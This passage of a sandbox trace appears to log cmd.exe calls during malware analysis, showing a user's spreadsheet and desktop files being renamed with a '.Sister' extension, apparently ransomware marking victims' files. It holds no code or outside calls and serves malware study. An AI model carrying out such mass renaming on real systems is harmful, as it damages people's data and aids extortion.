(hFile=0x50) returned 0x2 [0306.342] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.343] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.343] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.343] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0306.353] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.354] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.354] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.354] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.354] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.354] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.354] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.354] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.354] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.354] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.354] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.354] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.354] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.354] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.354] ??_V@YAXPEAX@Z () returned 0x1 [0306.354] GetProcessHeap () returned 0x21ed8c70000 [0306.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed9378ac0 [0306.355] GetProcessHeap () returned 0x21ed8c70000 [0306.355] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378ac0, Size=0x88) returned 0x21ed9378ac0 [0306.355] GetProcessHeap () returned 0x21ed8c70000 [0306.355] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9378ac0) returned 0x88 [0306.355] GetProcessHeap () returned 0x21ed8c70000 [0306.355] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d44ae0 [0306.355] GetProcessHeap () returned 0x21ed8c70000 [0306.355] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed9378b60 [0306.355] GetProcessHeap () returned 0x21ed8c70000 [0306.355] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378b60, Size=0x88) returned 0x21ed9378b60 [0306.355] GetProcessHeap () returned 0x21ed8c70000 [0306.355] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9378b60) returned 0x88 [0306.355] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.355] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.356] GetProcessHeap () returned 0x21ed8c70000 [0306.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65d10 [0306.356] GetProcessHeap () returned 0x21ed8c70000 [0306.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948b380 [0306.356] _wcsicmp (_String1="ZAZiikQ05Ny2stgiO-.xlsx", _String2=".") returned 76 [0306.356] _wcsicmp (_String1="ZAZiikQ05Ny2stgiO-.xlsx", _String2="..") returned 76 [0306.356] GetFileAttributesW (lpFileName="ZAZiikQ05Ny2stgiO-.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zaziikq05ny2stgio-.xlsx")) returned 0x20 [0306.356] GetProcessHeap () returned 0x21ed8c70000 [0306.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed949bd90 [0306.358] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed949bda0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.358] SetErrorMode (uMode=0x0) returned 0x0 [0306.358] SetErrorMode (uMode=0x1) returned 0x0 [0306.358] GetFullPathNameW (in: lpFileName="ZAZiikQ05Ny2stgiO-.xlsx", nBufferLength=0x7fe7, lpBuffer=0x21eda37fb00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ZAZiikQ05Ny2stgiO-.xlsx", lpFilePart=0xa6cf4fd660*="ZAZiikQ05Ny2stgiO-.xlsx") returned 0x31 [0306.358] SetErrorMode (uMode=0x0) returned 0x1 [0306.359] GetProcessHeap () returned 0x21ed8c70000 [0306.359] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948a750 [0306.359] _wcsicmp (_String1="ZAZiikQ05Ny2stgiO-.xlsx", _String2=".") returned 76 [0306.359] _wcsicmp (_String1="ZAZiikQ05Ny2stgiO-.xlsx", _String2="..") returned 76 [0306.359] GetFileAttributesW (lpFileName="ZAZiikQ05Ny2stgiO-.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zaziikq05ny2stgio-.xlsx")) returned 0x20 [0306.359] ??_V@YAXPEAX@Z () returned 0x1 [0306.359] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.359] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.359] malloc (_Size=0xffce) returned 0x21eda38fae0 [0306.359] ??_V@YAXPEAX@Z () returned 0x21eda38fae0 [0306.360] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ZAZiikQ05Ny2stgiO-.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zaziikq05ny2stgio-.xlsx")) returned 0x20 [0306.360] malloc (_Size=0xffce) returned 0x21ed993f900 [0306.360] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.361] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ZAZiikQ05Ny2stgiO-.xlsx", fInfoLevelId=0x1, lpFindFileData=0x21ed948b390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed948b390) returned 0x21ed8d66310 [0306.361] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0306.362] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0306.362] ??_V@YAXPEAX@Z () returned 0x1 [0306.362] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\ZAZiikQ05Ny2stgiO-.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zaziikq05ny2stgio-.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\ZAZiikQ05Ny2stgiO-.xlsx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\zaziikq05ny2stgio-.xlsx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0306.363] FindNextFileW (in: hFindFile=0x21ed8d66310, lpFindFileData=0x21ed948b390 | out: lpFindFileData=0x21ed948b390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x737537e0, ftCreationTime.dwHighDateTime=0x1d56c6b, ftLastAccessTime.dwLowDateTime=0x33b03750, ftLastAccessTime.dwHighDateTime=0x1d5b779, ftLastWriteTime.dwLowDateTime=0x33b03750, ftLastWriteTime.dwHighDateTime=0x1d5b779, nFileSizeHigh=0x0, nFileSizeLow=0x417a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZAZiikQ05Ny2stgiO-.xlsx", cAlternateFileName="")) returned 0 [0306.365] GetLastError () returned 0x12 [0306.365] FindClose (in: hFindFile=0x21ed8d66310 | out: hFindFile=0x21ed8d66310) returned 1 [0306.365] ??_V@YAXPEAX@Z () returned 0x1 [0306.365] ??_V@YAXPEAX@Z () returned 0x1 [0306.365] ??_V@YAXPEAX@Z () returned 0x1 [0306.365] ??_V@YAXPEAX@Z () returned 0x1 [0306.365] GetProcessHeap () returned 0x21ed8c70000 [0306.365] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65b90 [0306.365] GetProcessHeap () returned 0x21ed8c70000 [0306.365] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c955a0, Size=0x16) returned 0x21ed8c95880 [0306.365] GetProcessHeap () returned 0x21ed8c70000 [0306.365] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95880) returned 0x16 [0306.365] GetProcessHeap () returned 0x21ed8c70000 [0306.365] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x20) returned 0x21ed8d45e90 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e90) returned 0x20 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61660 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61660, Size=0xb2) returned 0x21ed93763b0 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93763b0) returned 0xb2 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a390 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a390, Size=0x30) returned 0x21ed8d3a390 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a390) returned 0x30 [0306.366] GetProcessHeap () returned 0x21ed8c70000 [0306.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a3d0 [0306.366] malloc (_Size=0x1ff9c) returned 0x21eda37fb00 [0306.367] GetProcessHeap () returned 0x21ed8c70000 [0306.367] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375c30 [0306.367] GetProcessHeap () returned 0x21ed8c70000 [0306.367] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9376470 [0306.367] ??_V@YAXPEAX@Z () returned 0x1 [0306.368] malloc (_Size=0x1ff9c) returned 0x21eda37fb00 [0306.368] GetProcessHeap () returned 0x21ed8c70000 [0306.368] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375570 [0306.368] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda37fb00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0306.368] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378bc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d66130 [0306.368] FindClose (in: hFindFile=0x21ed8d66130 | out: hFindFile=0x21ed8d66130) returned 1 [0306.368] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378bc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65bf0 [0306.369] FindClose (in: hFindFile=0x21ed8d65bf0 | out: hFindFile=0x21ed8d65bf0) returned 1 [0306.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378bc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d659b0 [0306.369] FindClose (in: hFindFile=0x21ed8d659b0 | out: hFindFile=0x21ed8d659b0) returned 1 [0306.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378bc0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0306.369] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.370] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.370] GetProcessHeap () returned 0x21ed8c70000 [0306.370] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d382d0 [0306.370] ??_V@YAXPEAX@Z () returned 0x1 [0306.370] ??_V@YAXPEAX@Z () returned 0x1 [0306.370] GetProcessHeap () returned 0x21ed8c70000 [0306.370] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a3d0, Size=0x490) returned 0x21ed8d3a3d0 [0306.370] GetProcessHeap () returned 0x21ed8c70000 [0306.370] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a3d0) returned 0x490 [0306.370] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0306.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.370] GetFileType (hFile=0x50) returned 0x2 [0306.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.371] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0306.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.371] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0306.378] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.378] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.378] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0306.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.378] GetFileType (hFile=0x50) returned 0x2 [0306.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.379] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0306.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.379] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0306.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.380] GetFileType (hFile=0x50) returned 0x2 [0306.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.380] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.381] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d3a3a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d3a3a0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0306.381] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0306.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.381] GetFileType (hFile=0x50) returned 0x2 [0306.381] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.381] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0306.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.382] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0306.391] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0306.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.391] GetFileType (hFile=0x50) returned 0x2 [0306.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.391] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.392] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0306.398] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.399] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.399] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.399] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.399] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.399] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.399] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.399] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.400] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.400] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.400] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.400] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.400] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.400] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.400] ??_V@YAXPEAX@Z () returned 0x1 [0306.400] GetProcessHeap () returned 0x21ed8c70000 [0306.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0306.400] GetProcessHeap () returned 0x21ed8c70000 [0306.400] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d2ccd0 [0306.400] GetProcessHeap () returned 0x21ed8c70000 [0306.400] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2ccd0) returned 0x130 [0306.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.400] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.400] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.400] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda37fb00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0306.402] ??_V@YAXPEAX@Z () returned 0x1 [0306.402] GetProcessHeap () returned 0x21ed8c70000 [0306.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2d090 [0306.402] GetProcessHeap () returned 0x21ed8c70000 [0306.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fbe0 [0306.402] GetProcessHeap () returned 0x21ed8c70000 [0306.402] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fbe0, Size=0x130) returned 0x21ed93b3440 [0306.403] GetProcessHeap () returned 0x21ed8c70000 [0306.403] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b3440) returned 0x130 [0306.403] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.403] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.403] GetProcessHeap () returned 0x21ed8c70000 [0306.403] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d66010 [0306.403] GetProcessHeap () returned 0x21ed8c70000 [0306.403] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948b110 [0306.403] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.403] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.403] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.403] GetLastError () returned 0x2 [0306.403] GetProcessHeap () returned 0x21ed8c70000 [0306.403] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94abd80 [0306.404] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94abd90 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.404] SetErrorMode (uMode=0x0) returned 0x0 [0306.404] SetErrorMode (uMode=0x1) returned 0x0 [0306.404] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda37fb00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0306.404] SetErrorMode (uMode=0x0) returned 0x1 [0306.404] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0306.404] GetProcessHeap () returned 0x21ed8c70000 [0306.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94893d0 [0306.404] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.404] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.404] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.404] GetLastError () returned 0x2 [0306.405] ??_V@YAXPEAX@Z () returned 0x1 [0306.405] malloc (_Size=0xffce) returned 0x21eda37fb00 [0306.405] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.405] malloc (_Size=0xffce) returned 0x21eda38fae0 [0306.405] ??_V@YAXPEAX@Z () returned 0x21eda38fae0 [0306.405] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.405] GetLastError () returned 0x2 [0306.405] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.405] GetFileType (hFile=0x54) returned 0x2 [0306.405] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0306.405] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0306.406] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0306.406] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.407] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.407] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0306.413] longjmp () [0306.414] ??_V@YAXPEAX@Z () returned 0x1 [0306.414] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1229ac0, ftCreationTime.dwHighDateTime=0x1d5e704, ftLastAccessTime.dwLowDateTime=0xf2fedd00, ftLastAccessTime.dwHighDateTime=0x1d5ee24, 